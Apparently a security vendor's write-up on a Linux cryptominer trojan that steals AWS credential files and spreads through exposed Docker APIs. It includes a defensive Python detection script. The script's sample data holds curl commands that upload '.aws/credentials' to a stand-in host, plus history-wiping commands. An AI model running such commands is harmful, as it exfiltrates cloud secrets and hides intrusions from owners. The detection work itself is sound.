AWS credentials stealer: Linux/Coinminer

Researchers in our lab have come across a cryptominer trojan that steals AWS credentials. It also steals other sensitive information from compromised Linux instances, and it has been found infecting instances that run Docker.

How does it steal AWS credentials?

AWS instances can be controlled using the AWS CLI tools. The tools store credentials and configuration details in the user's home directory, under the hidden directory “.aws/”. The credentials and configuration files stored in this directory are sent to the attackers' server using the curl tool, as an HTML form upload.

It also removes its traces by clearing the command history on the instance. The remote service that receives the stolen files responds “THX” to indicate a successful file transfer.
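One way to hunt for the two behaviours described above (the curl form upload of the “.aws/” files and the history clearing) in process execution records, as an added example that is not part of the original write-up or the malware's code. The sample command lines, host names and the history-clearing patterns are constructed assumptions; the article does not give the exact commands used.

```python
import re
import shlex

# curl options that send a local file: -F/--form (the HTML form upload the
# article describes), plus -T/--upload-file and -d/--data* as close variants.
UPLOAD_OPT = re.compile(r"^(-[A-Za-z]*[FTd]|--(form|upload-file|data))")
# An argument pointing at the AWS CLI credentials or config file.
AWS_FILE = re.compile(r"(^|[/@<=])\.aws/(credentials|config)\b")
# Assumed history-clearing forms; the article does not name the command used.
HISTORY_WIPE = re.compile(
    r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b|(\brm\b|>)[^|;&]*\.bash_history\b")

def tokens(cmdline):
    """Split a command line, also opening one level of `sh -c '...'` quoting."""
    try:
        outer = shlex.split(cmdline)
    except ValueError:              # unbalanced quotes in the log record
        outer = cmdline.split()
    return [part for tok in outer for part in tok.split()]

def classify(cmdline):
    """Return the set of finding labels for one process command line."""
    findings = set()
    if HISTORY_WIPE.search(cmdline):
        findings.add("history-cleared")
    argv = tokens(cmdline)
    runs_curl = any(t.rsplit("/", 1)[-1] == "curl" for t in argv)
    uploads = any(UPLOAD_OPT.match(t) for t in argv)
    aws_file = any(AWS_FILE.search(t) for t in argv)
    if runs_curl and uploads and aws_file:
        findings.add("aws-credential-upload")
    return findings

def scan(cmdlines):
    """Return (index, sorted labels) for every command line with a finding."""
    hits = ((i, sorted(classify(c))) for i, c in enumerate(cmdlines))
    return [(i, labels) for i, labels in hits if labels]

# Constructed sample of exec records; hosts and paths are made up.
SAMPLE = [
    "aws s3 ls",
    "curl -F report=@/var/log/app.log https://uploads.example/",
    "cat /home/dev/.aws/config",
    "/usr/bin/curl -F file=@/root/.aws/credentials http://collector.example/up",
    "sh -c 'curl -sF f=@/home/dev/.aws/config http://collector.example/up; history -c'",
    "rm -f /root/.bash_history",
]

if __name__ == "__main__":
    for index, labels in scan(SAMPLE):
        print(index, labels, SAMPLE[index])
```

Feed it command lines from whatever exec telemetry the instance already produces (audit records, EDR process events); a hit on both labels from the same session is the stronger signal.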

Worming on Docker

It also looks for misconfigured Docker instances using masscan, an open source pentesting tool. It accesses the misconfigured Docker APIs to install itself inside them.

It installs XMRig, an open source cryptocurrency mining tool. XMRig is used by the malware to mine Monero cryptocurrency for the attackers. The malware also installs other hacking tools on the compromised machines.

Arctos Networks detects the malware as Linux/Cryptominer.J.

If you find traces of this malware in your instances, you can get in touch with our security response unit to fix it.